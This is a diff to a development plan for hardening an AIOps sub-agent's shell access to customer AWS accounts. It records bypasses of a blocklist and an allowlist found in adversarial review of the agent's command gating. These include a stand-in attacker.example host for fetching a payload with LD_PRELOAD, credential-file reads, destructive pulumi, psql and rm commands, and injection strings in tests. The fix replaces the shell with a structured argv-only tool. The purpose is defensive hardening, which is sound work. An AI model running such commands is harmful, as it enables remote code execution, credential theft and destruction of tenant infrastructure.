-shell commands. It does not. For bash-like tool names `classifyTool` returns
-`{ isMutative: false, matchedRule: **true**, reason: 'read-only bash command' }` for
-*any* command string that misses its seven `MUTATIVE_BASH_PATTERNS` regexes
-(`tool-classifier.ts:178`). So `isReadOnlyForSubagent`'s `!matchedRule` branch — this
-task's entire premise — **is unreachable for `execute_command`**. Shell was gated by a
-blocklist, and inside a tool call (where LangGraph cannot interrupt and no human can
-approve) a blocklist is not a boundary.
-
-Proven bypasses, all classified read-only, all reaching `/bin/bash` with live tenant
-AWS credentials via `buildCommandEnv(tenantId)`:
+Two successive designs for gating shell inside a sub-agent failed adversarial review.
+The second — an allowlist that parsed the command string — was escaped to full RCE:
 
 ```
-aws --region us-east-1 ec2 terminate-instances --instance-ids i-1   # a flag before the service
-aws ec2 "terminate-instances" --instance-ids i-1                    # one quote
-aws ec2 authorize-security-group-ingress --port 22 --cidr 0.0.0.0/0 # verb absent from the list
-aws s3 sync ./evil s3://prod-bucket --delete
-aws kms schedule-key-deletion --key-id k --pending-window-in-days 7
-pulumi destroy --yes                                                # binary need not be aws
-python3 -c "import boto3; boto3.client('ec2').terminate_instances(InstanceIds=['i-1'])"
-psql $DATABASE_URL -c "DROP TABLE accounts"
-rm -r /app/data                                                     # only `rm -rf` was patterned
+ALLOWED  aws --endpoint-url https://attacker.example s3api get-object \
+             --bucket b --key evil.so /tmp/evil.so     # fetch any file from any host
+ALLOWED  LD_PRELOAD=/tmp/evil.so ls /                  # execute it
 ```
 
-The fix lives in `subagent.ts` only. **Do not touch `tool-classifier.ts`** — the guard
-node depends on its current behaviour for the human-approval path, where ambiguity
-correctly routes to a person.
+plus `aws --no-paginate s3 sync get-dir s3://prod --delete` (a boolean flag shifts which
+token is read as the operation), `cat /root/.aws/credentials`, and
+`aws redshift get-cluster-credentials --auto-create`, which mutates despite its `get-`
+prefix.
 
-Add to `apps/web-ui/lib/agent/subagent.ts`, above `isReadOnlyForSubagent`:
+The lesson is not "the allowlist needed more patches". Gating a shell string requires
+modelling all of bash **and** all of AWS CLI semantics, and every round of patching has
+produced a new escape. A sub-agent runs inside a tool call, where LangGraph cannot
+interrupt and no human can approve, so this boundary has to hold on its own.
+
+**Stop parsing. Remove the shell tools from sub-agents and give them a structured tool
+instead** (Step 7). Delete `SHELL_METACHAR`, `ALLOWED_SHELL_BINARIES`,
+`READ_ONLY_AWS_OP_PREFIX`, `READ_ONLY_AWS_OP_EXACT`, `READ_ONLY_KUBECTL_VERBS`,
+`unquote`, `isReadOnlyShellCommand`, `resolveShellCommand`, and the shell interception
+branch in `isReadOnlyForSubagent`.
+
+Keep `SHELL_TOOL_NAMES` and move every name into the denylist:
 
 ```typescript
 /**
- * Shell commands are ALLOWLISTED, not blocklisted.
- *
- * classifyTool treats any bash-like call that misses its mutative regexes as
- * "read-only bash command" WITH matchedRule: true — so the fail-closed
- * !matchedRule rule never fires for shell. That is adequate for the guard node
- * (a human reviews the call) but not here: a sub-agent runs inside a tool call,
- * which LangGraph cannot interrupt, so nothing downstream can stop the command.
- *
- * An adversarial review escaped the blocklist 23 ways — a flag before the
- * service name, a quote around the verb, a verb missing from the list, or simply
- * a different binary (pulumi, psql, python3). Enumerating mutations is
- * unwinnable; enumerating the reads we actually need is not.
+ * Never available to a sub-agent, regardless of what classifyTool says.
+ * - dispatch_agent: depth cap of 1; recursion makes cost and latency unbounded.
+ * - ask_user: pauses for a human, and no human is reachable inside a tool call.
+ * - shell: two designs for gating a command string were escaped (the second to RCE
+ *   via `s3api get-object` writing an arbitrary local path, then LD_PRELOAD). A
+ *   sub-agent reaches AWS through the structured aws_read tool instead, which builds
+ *   argv itself and never invokes a shell.
  */
 const SHELL_TOOL_NAMES = new Set(['bash', 'shell', 'run_command', 'execute_command']);
-
-/** Metacharacters that allow chaining, substitution, or redirection out of the allowlist. */
-const SHELL_METACHAR = /[;&|`$><\n\r]/;
-
-/** Binaries a sub-agent may invoke at all. */
-const ALLOWED_SHELL_BINARIES = new Set([
-    'aws', 'kubectl', 'cat', 'ls', 'grep', 'head', 'tail', 'wc', 'jq', 'echo',
+const SUBAGENT_TOOL_DENYLIST = new Set([
+    'dispatch_agent', 'ask_user', ...SHELL_TOOL_NAMES,
 ]);
+```
 
-/** AWS operation prefixes that are read-only by CLI convention. */
-const READ_ONLY_AWS_OP_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+`filterReadOnlyTools` loses its `execute_command` special case — the denylist now covers
+it, and the two layers agree:
 
-/** Read-only AWS operations that do not follow the prefix convention. */
-const READ_ONLY_AWS_OP_EXACT = new Set(['ls', 'filter-log-events', 'query', 'scan', 'help']);
-
-/** Read-only kubectl verbs. */
-const READ_ONLY_KUBECTL_VERBS = new Set([
-    'get', 'describe', 'logs', 'top', 'version', 'api-resources', 'explain',
-]);
-
-/** Strip one layer of surrounding quotes: `aws ec2 "terminate-instances"` must not hide the verb. */
-function unquote(token: string): string {
-    return token.replace(/^['"]|['"]$/g, '');
+```typescript
+export function filterReadOnlyTools<T extends { name: string }>(tools: T[]): T[] {
+    return tools.filter(tool => isReadOnlyForSubagent(tool.name).allowed);
 }
+```
 
+- [ ] **Step 7: Add the structured `aws_read` tool**
+
+**Files:** create `apps/web-ui/lib/agent/aws-read-tool.ts`, create
+`apps/web-ui/lib/agent/aws-read-tool.test.ts`.
+
+The whole point: there is **no command string**, so there is nothing to parse. The
+server builds `argv` and calls `execFile` with `shell: false`. Metacharacters, quoting,
+flag-order confusion, `VAR=value` prefixes, and `$(...)` cease to exist as a category —
+they are inert data in an argv element, never interpreted.
+
+```typescript
 /**
- * Resolve the command string from a bash-like tool's args. Returns null when the
- * args carry no usable command — an array, a number, an empty object. classifyTool
- * fails open on `{}` and stringifies an array into a comma-joined string that
- * matches no pattern, so both must be refused here.
+ * aws_read — the ONLY route from a sub-agent to AWS.
+ *
+ * Sub-agents have no shell (see subagent.ts's denylist). This tool takes a
+ * structured request and builds argv itself, then runs `execFile` with
+ * shell: false. Nothing the model supplies is ever interpreted by a shell, so the
+ * escape classes that broke two previous designs — metacharacters, quoting,
+ * flag-order confusion, LD_PRELOAD prefixes, command substitution — are not
+ * merely blocked here, they are unrepresentable.
+ *
+ * Three further restrictions close what a structured call could still reach:
+ *  - no positional arguments, so `s3api get-object … OUTFILE` cannot write a file;
+ *  - a denied-flag set, so --endpoint-url cannot exfiltrate and --cli-input-json
+ *    cannot smuggle parameters past validation;
+ *  - a denied-operation set, so credential-minting reads (sts get-session-token,
+ *    ecr get-login-password) and mutating "get-" operations
+ *    (redshift get-cluster-credentials --auto-create) are refused by name.
  */
-export function resolveShellCommand(args?: Record<string, unknown>): string | null {
-    for (const key of ['command', 'cmd', 'input']) {
-        const value = args?.[key];
-        if (typeof value === 'string' && value.trim().length > 0) return value;
-        if (value !== undefined) return null; // present but not a usable string
+import { execFile } from 'child_process';
+import { promisify } from 'util';
+import { tool } from '@langchain/core/tools';
+import { z } from 'zod';
+import { buildCommandEnv } from './tools';
+
+const execFileAsync = promisify(execFile);
+
+const AWS_READ_TIMEOUT_MS = 120_000;
+const AWS_READ_MAX_BUFFER = 10 * 1024 * 1024;
+export const AWS_READ_OUTPUT_MAX_CHARS = 100_000;
+
+/** Read-only operation prefixes, by AWS CLI convention. */
+const READ_OPERATION_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+
+/** Operations that match the read prefix but mint credentials or mutate. */
+const DENIED_OPERATIONS = new Set([
+    'get-session-token', 'get-federation-token', 'get-login-password',
+    'get-token', 'get-password-data', 'get-cluster-credentials',
+    'get-instance-access-details', 'get-credential-report', 'get-authorization-token',
+]);
+
+/** Flags that would let a structured call reach outside its intent. */
+const DENIED_FLAGS = new Set([
+    '--endpoint-url', '--cli-input-json', '--cli-input-yaml', '--outfile',
+    '--debug', '--no-sign-request', '--ca-bundle', '--cli-binary-format',
+]);
+
+const IDENT = /^[a-z0-9][a-z0-9-]*$/;
+const REGION = /^[a-z0-9-]+$/;
+const PROFILE = /^[A-Za-z0-9_-]+$/;
+const FLAG = /^--[a-z0-9][a-z0-9-]*$/;
+
+export function validateAwsReadRequest(input: {
+    service: string; operation: string; region?: string; profile?: string;
+    params?: Record<string, string>;
+}): string | null {
+    if (!IDENT.test(input.service)) return `service "${input.service}" is not a valid AWS service name`;
+    if (!IDENT.test(input.operation)) return `operation "${input.operation}" is not a valid operation name`;
+    if (DENIED_OPERATIONS.has(input.operation)) {
+        return `operation "${input.operation}" returns credentials or mutates state and is not available to sub-agents`;
+    }
+    if (!READ_OPERATION_PREFIX.test(input.operation)) {
+        return `operation "${input.operation}" is not a read-only operation (must start with describe-, list-, get-, head-, search-, lookup-, check-, or batch-get-)`;
+    }
+    if (input.region !== undefined && !REGION.test(input.region)) return `invalid region "${input.region}"`;
+    if (input.profile !== undefined && !PROFILE.test(input.profile)) return `invalid profile "${input.profile}"`;
+
+    for (const [flag, value] of Object.entries(input.params ?? {})) {
+        if (!FLAG.test(flag)) return `parameter "${flag}" is not a valid --flag name`;
+        if (DENIED_FLAGS.has(flag)) return `parameter "${flag}" is not available to sub-agents`;
+        if (typeof value !== 'string') return `parameter "${flag}" must have a string value`;
     }
     return null;
 }
 
-/** Allowlist verdict for one shell command string. */
-export function isReadOnlyShellCommand(cmd: string): { allowed: boolean; reason: string } {
-    if (SHELL_METACHAR.test(cmd)) {
-        return { allowed: false, reason: 'command contains shell metacharacters (chaining, substitution, or redirection)' };
-    }
+/** Build argv. Exported so tests can assert the exact array without executing anything. */
+export function buildAwsReadArgv(input: {
+    service: string; operation: string; region?: string; profile?: string;
+    params?: Record<string, string>;
+}): string[] {
+    const argv = [input.service, input.operation];
+    if (input.region) argv.push('--region', input.region);
+    if (input.profile) argv.push('--profile', input.profile);
+    for (const [flag, value] of Object.entries(input.params ?? {})) argv.push(flag, value);
+    argv.push('--output', 'json');
+    return argv;
+}
 
-    // Quotes are stripped per token, so splitting on whitespace is sufficient once
-    // metacharacters are already refused.
-    const tokens = cmd.trim().split(/\s+/).map(unquote).filter(t => t.length > 0);
-    // Drop leading VAR=value assignments (`AWS_PROFILE=x aws ...`).
-    while (tokens.length > 0 && /^[A-Za-z_][A-Za-z0-9_]*=/.test(tokens[0])) tokens.shift();
-    if (tokens.length === 0) return { allowed: false, reason: 'empty command' };
+export function createAwsReadTool(tenantId: string) {
+    return tool(
+        async (input: {
+            service: string; operation: string; region?: string; profile?: string;
+            params?: Record<string, string>;
+        }): Promise<string> => {
+            const error = validateAwsReadRequest(input);
+            if (error) return `REFUSED: ${error}`;
 
-    const binary = tokens[0];
-    if (!ALLOWED_SHELL_BINARIES.has(binary)) {
-        return { allowed: false, reason: `binary "${binary}" is not on the sub-agent read-only allowlist` };
-    }
-
-    if (binary === 'aws') {
-        // Walk past global flags AND their values to find <service> then <operation>.
-        // This is what defeated the old regex: it assumed `aws <service> <verb>` adjacency.
-        const positional: string[] = [];
-        for (let i = 1; i < tokens.length; i++) {
-            const token = tokens[i];
-            if (token.startsWith('-')) {
-                // A flag's value is the next token when it is not itself a flag.
-                if (i + 1 < tokens.length && !tokens[i + 1].startsWith('-')) i++;
-                continue;
+            const argv = buildAwsReadArgv(input);
+            try {
+                // shell: false is the entire safety argument — argv elements are passed
+                // to execve directly and are never tokenised or interpreted.
+                const { stdout, stderr } = await execFileAsync('aws', argv, {
+                    shell: false,
+                    timeout: AWS_READ_TIMEOUT_MS,
+                    maxBuffer: AWS_READ_MAX_BUFFER,
+                    env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
+                });
+                const output = stdout || stderr || '(no output)';
+                return output.length > AWS_READ_OUTPUT_MAX_CHARS
+                    ? `${output.slice(0, AWS_READ_OUTPUT_MAX_CHARS)}\n…[truncated]`
+                    : output;
+            } catch (err) {
+                const e = err as { message?: string; stderr?: string };
+                return `ERROR: ${e.message ?? String(err)}\n${e.stderr ?? ''}`.trim();
             }
-            positional.push(token);
-            if (positional.length === 2) break;
-        }
-        const operation = positional[1];
-        if (!operation) return { allowed: false, reason: 'aws command has no resolvable operation' };
-        if (!READ_ONLY_AWS_OP_PREFIX.test(operation) && !READ_ONLY_AWS_OP_EXACT.has(operation)) {
-            return { allowed: false, reason: `aws operation "${operation}" is not a verified read-only operation` };
-        }
-        return { allowed: true, reason: `aws read-only operation "${operation}"` };
-    }
+        },
+        {
+            name: 'aws_read',
+            description: `Run a READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
 
-    if (binary === 'kubectl') {
-        const verb = tokens.slice(1).find(t => !t.startsWith('-'));
-        if (!verb || !READ_ONLY_KUBECTL_VERBS.has(verb)) {
-            return { allowed: false, reason: `kubectl verb "${verb ?? '(none)'}" is not read-only` };
-        }
-        return { allowed: true, reason: `kubectl read-only verb "${verb}"` };
-    }
+Provide the service and operation separately; do not write a command line. Parameters are passed as a map of flag to value.
 
-    return { allowed: true, reason: `read-only utility "${binary}"` };
+Example: { "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_123456789012_...", "params": { "--filters": "Name=instance-state-name,Values=running" } }
+
+Only read operations are permitted (describe-, list-, get-, head-, search-, lookup-, check-, batch-get-). Mutations are refused: report what should change in your findings and the main agent will carry it out under human approval.`,
+            schema: z.object({
+                service: z.string().describe('AWS service, e.g. "ec2", "rds", "cloudwatch"'),
+                operation: z.string().describe('Read-only operation, e.g. "describe-instances"'),
+                region: z.string().optional().describe('AWS region'),
+                profile: z.string().optional().describe('Profile name from get_aws_credentials'),
+                params: z.record(z.string(), z.string()).optional()
+                    .describe('CLI flags as a map, e.g. { "--instance-ids": "i-123" }'),
+            }),
+        },
+    );
 }
 ```
 
-Then, in `isReadOnlyForSubagent`, intercept bash-like tools **before** delegating to
-`classifyTool`. Insert immediately after the denylist check:
+`buildCommandEnv` is currently module-private in `tools.ts` — export it. It already
+curates the environment (`session-manager`'s per-tenant credentials file, no app
+secrets), which is what makes `execFile` safe to hand a tenant profile.
+
+- [ ] **Step 8: Wire `aws_read` into the sub-agent tool list**
+
+In `subagent.ts`, `runSubagentLoop` builds `allowedTools` from `deps.tools`. The
+orchestrator passes its own tool list, which contains `execute_command` — now denied.
+Add `aws_read` as a sub-agent-only tool. In `dispatch-agent-tool.ts` (Task 8) the
+`subagentTools` array becomes:
 
 ```typescript
-    // Shell is allowlisted here rather than delegated to classifyTool, whose
-    // bash handling is a blocklist that reports matchedRule: true on a miss.
-    if (SHELL_TOOL_NAMES.has(name.toLowerCase())) {
-        const cmd = resolveShellCommand(args);
-        if (cmd === null) {
-            return { allowed: false, reason: `${name} called without a usable command string` };
-        }
-        const verdict = isReadOnlyShellCommand(cmd);
-        return verdict.allowed
-            ? { allowed: true, reason: verdict.reason }
-            : { allowed: false, reason: `shell call refused: ${verdict.reason}` };
-    }
+subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId)],
 ```
 
-- [ ] **Step 7: Make the timeout actually cancel the loop (IMPORTANT)**
+Sub-agents keep `get_aws_credentials` (it returns a profile name, mutates nothing), so
+the flow is unchanged: acquire a profile, then pass it to `aws_read`.
 
-`Promise.race` abandons `runSubagentLoop` but nothing stops it. Measured: `runSubagent`
-returned after 2 model calls while the orphaned loop ran **8 more model calls and 9 more
-tool calls** against customer AWS — invisible to `maxSubagentTokensPerRun`, and with
-Task 8's concurrency semaphore already released, so real concurrency exceeds its cap.
+Update the sub-agent system prompt in `buildSystemPrompt` — replace the batching line
+with:
 
-Give the loop a cancellation token and shared progress. Change `runSubagentLoop`'s
-signature to accept a control object:
-
-```typescript
-interface SubagentControl {
-    cancelled: boolean;
-    progress: { toolCount: number; tokensIn: number; tokensOut: number };
-}
+```
+- You have NO shell. Reach AWS only through aws_read, passing the service and operation separately. Call get_aws_credentials first to obtain a profile name.
+- Batch independent aws_read calls into a single turn — they run in parallel.
 ```
 
-Inside the loop, update `control.progress` wherever the local counters are updated, and
-bail at two checkpoints — the top of each lap and immediately before each tool invoke:
+- [ ] **Step 9: Tests**
+
+Add `apps/web-ui/lib/agent/aws-read-tool.test.ts`:
 
 ```typescript
-        if (control.cancelled) {
-            return {
-                report: finishReport(lastText, 'CANCELLED — the sub-agent exceeded its time limit. Findings above are partial.'),
-                toolCount, tokensIn, tokensOut, status: 'done', transcript,
-            };
-        }
-```
+import { describe, it, expect } from 'vitest';
+import { validateAwsReadRequest, buildAwsReadArgv } from './aws-read-tool';
 
-In `runSubagent`, create the control object, pass it in, and on the timeout branch set
-`control.cancelled = true` and report the REAL usage from `control.progress` rather than
-hardcoded zeros (the same applies to the catch branch):
+const ok = { service: 'ec2', operation: 'describe-instances' };
 
-```typescript
-        if (outcome === 'timeout') {
-            control.cancelled = true;
-            return {
-                report: finishReport('', `TIMED OUT after ${Math.round(timeoutMs / 1000)}s — no findings were returned in time.`),
-                toolCount: control.progress.toolCount,
-                tokensIn: control.progress.tokensIn,
-                tokensOut: control.progress.tokensOut,
-                status: 'failed', transcript: [],
-            };
-        }
-```
-
-Also move the `const timeoutMs = deps.budget.subagentTimeoutMs` read **inside** the
-`try` — it currently sits outside, so a malformed `deps.budget` throws out of a function
-whose contract is that it never throws.
-
-And replace the `toolCount` string-sniffing (`if (!output.startsWith('REFUSED:'))`) with
-a boolean carried from the verdict — a real tool whose output happens to begin with
-`REFUSED:` (an echoed IAM denial) currently goes uncounted.
-
-- [ ] **Step 8: Add the bypass regression tests**
-
-Every command below is a **proven** bypass of the old blocklist, so these tests have
-teeth by construction. Add to `subagent.test.ts`:
-
-```typescript
-describe('shell allowlist — proven bypasses of the old blocklist', () => {
-    const REFUSED = [
-        'aws --region us-east-1 ec2 terminate-instances --instance-ids i-1',
-        'aws --profile prod ec2 stop-instances --instance-ids i-1',
-        'aws ec2 "terminate-instances" --instance-ids i-1',
-        "aws ec2 'delete-security-group' --group-id sg-1",
-        'aws ec2 authorize-security-group-ingress --group-id sg-1 --port 22 --cidr 0.0.0.0/0',
-        'aws ecs execute-command --cluster c --task t --command /bin/sh',
-        'aws s3 sync ./evil s3://prod-bucket --delete',
-        'aws s3 cp ./evil.sh s3://prod-bucket/boot.sh',
-        'aws rds restore-db-instance-from-db-snapshot --db-instance-identifier x',
-        'aws kms schedule-key-deletion --key-id k --pending-window-in-days 7',
-        'aws cloudformation cancel-update-stack --stack-name s',
-        'pulumi up --stack prod --yes',
-        'pulumi destroy --yes',
-        'python3 -c import boto3',
-        'rm important.tf',
-        'rm -r /app/data',
-        'kubectl run evil --image=alpine',
-        'kubectl delete pod x',
-        'npm run deploy:prod',
-        'bash deploy.sh',
-        'node ./scripts/wipe.js',
-        'echo pwned > /app/config.json',                 // metacharacter
-        'aws ec2 describe-instances && rm -rf /',         // metacharacter
-        'aws ec2 describe-instances; pulumi destroy',     // metacharacter
-        'aws ec2 describe-instances $(rm -rf /)',         // metacharacter
-    ];
-
-    for (const cmd of REFUSED) {
-        it(`refuses: ${cmd}`, () => {
-            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(false);
-        });
-    }
-
-    const ALLOWED = [
-        'aws ec2 describe-instances --output json',
-        'aws --region us-east-1 ec2 describe-instances',
-        'AWS_PROFILE=nucleus_agent_1 aws ec2 describe-instances',
-        'aws --profile p --region r rds describe-db-instances',
-        'aws sts get-caller-identity',
-        'aws cloudwatch get-metric-statistics --metric-name CPUUtilization',
-        'aws logs filter-log-events --log-group-name x',
-        'aws s3 ls s3://bucket',
-        'kubectl get pods -n default',
-        'kubectl describe pod x',
-        'kubectl logs pod/x',
-        'cat /tmp/report.json',
-        'ls -la /tmp',
-        'grep -r error /var/log',
-        'jq .Reservations /tmp/out.json',
-    ];
-
-    for (const cmd of ALLOWED) {
-        it(`allows: ${cmd}`, () => {
-            expect(isReadOnlyForSubagent('execute_command', { command: cmd }).allowed).toBe(true);
-        });
-    }
-
-    it('refuses a bash-like call with no usable command string', () => {
-        // classifyTool fails OPEN on {} and stringifies an array into a
-        // comma-joined string that matches no mutative pattern.
-        expect(isReadOnlyForSubagent('execute_command', {}).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', undefined).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', { command: ['aws', 'ec2', 'terminate-instances'] } as never).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', { command: '' }).allowed).toBe(false);
-        expect(isReadOnlyForSubagent('execute_command', { command: 0 } as never).allowed).toBe(false);
+describe('validateAwsReadRequest', () => {
+    it('accepts a read operation', () => {
+        expect(validateAwsReadRequest(ok)).toBeNull();
     });
 
-    it('applies the allowlist to every bash-like tool name, any case', () => {
-        for (const name of ['bash', 'shell', 'run_command', 'EXECUTE_COMMAND', 'Bash']) {
-            expect(isReadOnlyForSubagent(name, { command: 'pulumi destroy --yes' }).allowed).toBe(false);
-            expect(isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' }).allowed).toBe(true);
+    it('refuses a mutating operation', () => {
+        for (const operation of ['terminate-instances', 'delete-bucket', 'sync', 'cp', 'run-instances']) {
+            expect(validateAwsReadRequest({ ...ok, operation })).toMatch(/not a read-only operation/);
         }
+    });
+
+    it('refuses credential-minting reads that match the read prefix', () => {
+        for (const operation of [
+            'get-session-token', 'get-federation-token', 'get-login-password',
+            'get-token', 'get-password-data', 'get-cluster-credentials',
+        ]) {
+            expect(validateAwsReadRequest({ ...ok, service: 'sts', operation }))
+                .toMatch(/credentials or mutates/);
+        }
+    });
+
+    it('refuses flags that reach outside the request', () => {
+        for (const flag of ['--endpoint-url', '--cli-input-json', '--outfile', '--no-sign-request']) {
+            expect(validateAwsReadRequest({ ...ok, params: { [flag]: 'x' } }))
+                .toMatch(/not available to sub-agents/);
+        }
+    });
+
+    it('refuses malformed identifiers rather than passing them through', () => {
+        expect(validateAwsReadRequest({ ...ok, service: 'ec2; rm -rf /' })).toMatch(/not a valid AWS service/);
+        expect(validateAwsReadRequest({ ...ok, operation: 'describe-instances && pulumi destroy' })).toMatch(/not a valid operation/);
+        expect(validateAwsReadRequest({ ...ok, region: 'us-east-1$(id)' })).toMatch(/invalid region/);
+        expect(validateAwsReadRequest({ ...ok, profile: '../../etc/passwd' })).toMatch(/invalid profile/);
+        expect(validateAwsReadRequest({ ...ok, params: { 'notaflag': 'x' } })).toMatch(/not a valid --flag/);
     });
 });
 
-describe('timeout cancellation', () => {
-    it('stops the loop instead of leaving it running', async () => {
-        let laps = 0;
-        const model: any = {
-            bindTools: () => model,
-            invoke: async () => {
-                laps++;
-                await new Promise(r => setTimeout(r, 30));
-                return { content: '', tool_calls: [{ id: `${laps}`, name: 'describe_instances', args: {} }], usage_metadata: { input_tokens: 10, output_tokens: 5 } };
-            },
-        };
-        const tool = { name: 'describe_instances', invoke: async () => 'ok' };
-
-        await runSubagent(SPEC, { model, tools: [tool], budget: { ...BUDGET, subagentMaxIterations: 20, subagentTimeoutMs: 60 } });
-        const lapsAtReturn = laps;
-
-        // If the loop were abandoned rather than cancelled it would keep going.
-        await new Promise(r => setTimeout(r, 300));
-        expect(laps).toBeLessThanOrEqual(lapsAtReturn + 1);
+describe('buildAwsReadArgv', () => {
+    it('emits service, operation, flags and json output — never a shell string', () => {
+        expect(buildAwsReadArgv({
+            service: 'ec2', operation: 'describe-instances',
+            region: 'us-east-1', profile: 'nucleus_agent_1',
+            params: { '--instance-ids': 'i-123' },
+        })).toEqual([
+            'ec2', 'describe-instances', '--region', 'us-east-1',
+            '--profile', 'nucleus_agent_1', '--instance-ids', 'i-123',
+            '--output', 'json',
+        ]);
     });
 
-    it('reports real usage on timeout rather than zeros', async () => {
-        const model: any = {
-            bindTools: () => model,
-            invoke: async () => {
-                await new Promise(r => setTimeout(r, 30));
-                return { content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }], usage_metadata: { input_tokens: 100, output_tokens: 20 } };
-            },
-        };
-        const tool = { name: 'describe_instances', invoke: async () => 'ok' };
-
-        const result = await runSubagent(SPEC, { model, tools: [tool], budget: { ...BUDGET, subagentMaxIterations: 20, subagentTimeoutMs: 80 } });
-        expect(result.tokensIn).toBeGreaterThan(0);
+    it('emits no positional arguments, so an outfile cannot be supplied', () => {
+        const argv = buildAwsReadArgv({ service: 's3api', operation: 'get-object', params: { '--bucket': 'b', '--key': 'k' } });
+        // Every element after the leading service+operation is a flag or a flag's value.
+        expect(argv.slice(2).filter((t, i, a) => !t.startsWith('--') && !a[i - 1]?.startsWith('--'))).toEqual([]);
     });
-});
 
-describe('runSubagent totality', () => {
-    it('does not throw on a malformed budget', async () => {
-        const model: any = { bindTools: () => model, invoke: async () => ({ content: 'x', tool_calls: [] }) };
-        await expect(
-            runSubagent(SPEC, { model, tools: [], budget: undefined as never }),
-        ).resolves.toMatchObject({ status: 'failed' });
-    });
-});
-
-describe('hallucinated tool names', () => {
-    it('refuses a tool that passes the jail but is not in the tool list', async () => {
-        // The second layer's whole purpose: the model invents a name it was never given.
-        const model: any = {
-            bindTools: () => model,
-            invoke: vi.fn()
-                .mockResolvedValueOnce({ content: '', tool_calls: [{ id: '1', name: 'describe_instances', args: {} }], usage_metadata: {} })
-                .mockResolvedValueOnce({ content: 'Could not read it.', tool_calls: [], usage_metadata: {} }),
-        };
-        const result = await runSubagent(SPEC, { model, tools: [], budget: BUDGET });
-        expect(result.status).toBe('done');
-        expect(result.transcript.some(e => e.text.includes('REFUSED'))).toBe(true);
+    it('treats injection attempts as inert argv data', () => {
+        // These never reach a shell, so they are values — not code. Validation
+        // refuses them anyway; this pins that argv construction does not concatenate.
+        const argv = buildAwsReadArgv({ service: 'ec2', operation: 'describe-instances', params: { '--filters': 'a; rm -rf /' } });
+        expect(argv).toContain('a; rm -rf /');
+        expect(argv.join(' ')).not.toContain('&&');
     });
 });
 ```
 
-Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent.test.ts`
+Replace the shell-allowlist block in `subagent.test.ts` with a much simpler assertion —
+shell is simply gone:
+
+```typescript
+describe('shell is unavailable to sub-agents', () => {
+    it('refuses every bash-like tool name in any case', () => {
+        for (const name of ['bash', 'shell', 'run_command', 'execute_command', 'Execute_Command', 'EXECUTE_COMMAND']) {
+            const verdict = isReadOnlyForSubagent(name, { command: 'aws ec2 describe-instances' });
+            expect(verdict.allowed).toBe(false);
+            expect(verdict.reason).toMatch(/not available to sub-agents/);
+        }
+    });
+
+    it('drops shell tools from the filtered list', () => {
+        const kept = filterReadOnlyTools([
+            { name: 'describe_instances' }, { name: 'execute_command' },
+            { name: 'bash' }, { name: 'dispatch_agent' }, { name: 'ask_user' },
+        ]);
+        expect(kept.map(t => t.name)).toEqual(['describe_instances']);
+    });
+});
+```
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/subagent.test.ts lib/agent/aws-read-tool.test.ts`
 
 ```bash
-git add apps/web-ui/lib/agent/subagent.ts apps/web-ui/lib/agent/subagent.test.ts
-git commit -m "fix(agent): allowlist sub-agent shell commands and cancel on timeout
+git add apps/web-ui/lib/agent/subagent.ts apps/web-ui/lib/agent/subagent.test.ts \
+        apps/web-ui/lib/agent/aws-read-tool.ts apps/web-ui/lib/agent/aws-read-tool.test.ts \
+        apps/web-ui/lib/agent/tools.ts
+git commit -m "fix(agent)!: replace sub-agent shell parsing with a structured aws_read tool
 
-An adversarial review escaped the shell blocklist 23 ways: a flag before the
-service name, a quote around the verb, a verb missing from the pattern list, or
-simply a different binary (pulumi, psql, python3). classifyTool reports
-matchedRule:true for any bash command that misses its regexes, so the
-fail-closed rule never applied to shell — and a sub-agent runs inside a tool
-call, where LangGraph cannot interrupt and no human can approve.
+Two designs for gating a shell command string inside a sub-agent failed
+adversarial review. The second was escaped to full RCE: s3api get-object with
+--endpoint-url fetches an arbitrary file from an arbitrary host to an arbitrary
+local path (the outfile positional was never examined), then an LD_PRELOAD
+prefix executes it. A boolean global flag also shifted which token was read as
+the operation, restoring 'aws s3 sync … --delete' against a production bucket.
 
-Replace it with an allowlist: refuse shell metacharacters, then require an
-allowlisted binary and a read-only operation resolved by tokenising past global
-flags. Also cancel the loop on timeout (it previously ran on unsupervised,
-spending untracked tokens), refuse bash-like calls with no usable command
-string, and report real usage on the timeout path."
+Gating a shell string means modelling all of bash and all of AWS CLI semantics.
+Sub-agents now have no shell at all: aws_read takes service and operation
+separately, builds argv server-side, and runs execFile with shell: false, so
+metacharacters, quoting, flag-order confusion and env prefixes are
+unrepresentable rather than merely blocked. No positionals (so no outfile
+write), a denied-flag set (no --endpoint-url exfiltration, no --cli-input-json),
+and a denied-operation set (no credential-minting reads)."
 ```
 
 ---
@@ -3126,6 +3098,7 @@ In `apps/web-ui/lib/agent/planning-agent.ts`, add imports:
 import { resolveSubagentBudget } from "./subagent-budget";
 import { createRunBudgetLedger, createDispatchAgentTool } from "./dispatch-agent-tool";
 import { filterReadOnlyTools } from "./subagent";
+import { createAwsReadTool } from "./aws-read-tool";
 ```
 
 Then replace the tool-assembly block at line 226 with:
@@ -3142,7 +3115,9 @@ Then replace the tool-assembly block at line 226 with:
     const dispatchAgentTool = subagentBudget.enabled
         ? createDispatchAgentTool({
             model,
-            subagentTools: filterReadOnlyTools(baseTools as never[]),
+            // Sub-agents have NO shell (Task 7 Step 6). aws_read is their only
+            // route to AWS; it builds argv and runs execFile with shell: false.
+            subagentTools: [...filterReadOnlyTools(baseTools as never[]), createAwsReadTool(tenantId!)],
             ledger: createRunBudgetLedger(subagentBudget),
             budget: subagentBudget,
             onSubagentEvent: config.onSubagentEvent,

--- a/docs/superpowers/specs/2026-07-26-aiops-subagent-orchestration-design.md
+++ b/docs/superpowers/specs/2026-07-26-aiops-subagent-orchestration-design.md
@@ -1,0 +1,405 @@
+# AIOps Sub-Agent Orchestration — Design
+
+**Date:** 2026-07-26
